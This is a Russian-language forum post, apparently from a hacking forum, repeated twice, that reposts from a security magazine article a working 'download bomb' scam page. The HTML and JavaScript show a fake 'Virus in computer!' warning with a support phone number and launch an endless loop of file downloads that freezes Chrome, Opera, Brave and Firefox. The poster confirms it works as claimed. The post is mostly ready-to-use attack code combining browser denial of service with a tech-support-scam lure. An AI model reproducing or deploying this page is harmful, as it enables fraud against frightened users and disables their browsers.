User_75821
Guest
U
User_75821
Guest
Копи-паст(слив)
Прочитал [URL='https://xakep.ru/2018/02/07/download-bombs-scam/']статью[/url] и решил запостить сюда.
Поражает: Chrome, Opera, Brave, Firefox
<!DOCTYPE HTML>
<html>
<head>
<meta charset="utf-8">
<title>Virus in computer!</title>
</head>
<body>
<h1>Virus in computer!!!!!</h1>
<p>Call to +1-888-888-8888</p>
<script>
function download(g, h, j) {
var k = new Blob([g], { type: j });
if (window.navigator.msSaveOrOpenBlob) window.navigator.msSaveOrOpenBlob(k, h);
else {
var l = document.createElement("a"),
m = URL.createObjectURL(k);
l.href = m, l.download = h, l.click(), setTimeout(function() {}, 0)
}
}
function bomb_ch() {
var g = Math.random().toString(36).substring(20), h = Math.floor(50 * Math.random() + 25);
while (true) download(h, g, g)
}
function ch_jam() {
bomb_ch()
}
setInterval(ch_jam, 0.5);
</script>
</body>
</html>
Работает как и заявлено. Грузит 100%, не реагирует на закрытие (но не на залип Ctrl+W)
Прочитал [URL='https://xakep.ru/2018/02/07/download-bombs-scam/']статью[/url] и решил запостить сюда.
Поражает: Chrome, Opera, Brave, Firefox
<!DOCTYPE HTML>
<html>
<head>
<meta charset="utf-8">
<title>Virus in computer!</title>
</head>
<body>
<h1>Virus in computer!!!!!</h1>
<p>Call to +1-888-888-8888</p>
<script>
function download(g, h, j) {
var k = new Blob([g], { type: j });
if (window.navigator.msSaveOrOpenBlob) window.navigator.msSaveOrOpenBlob(k, h);
else {
var l = document.createElement("a"),
m = URL.createObjectURL(k);
l.href = m, l.download = h, l.click(), setTimeout(function() {}, 0)
}
}
function bomb_ch() {
var g = Math.random().toString(36).substring(20), h = Math.floor(50 * Math.random() + 25);
while (true) download(h, g, g)
}
function ch_jam() {
bomb_ch()
}
setInterval(ch_jam, 0.5);
</script>
</body>
</html>
Работает как и заявлено. Грузит 100%, не реагирует на закрытие (но не на залип Ctrl+W)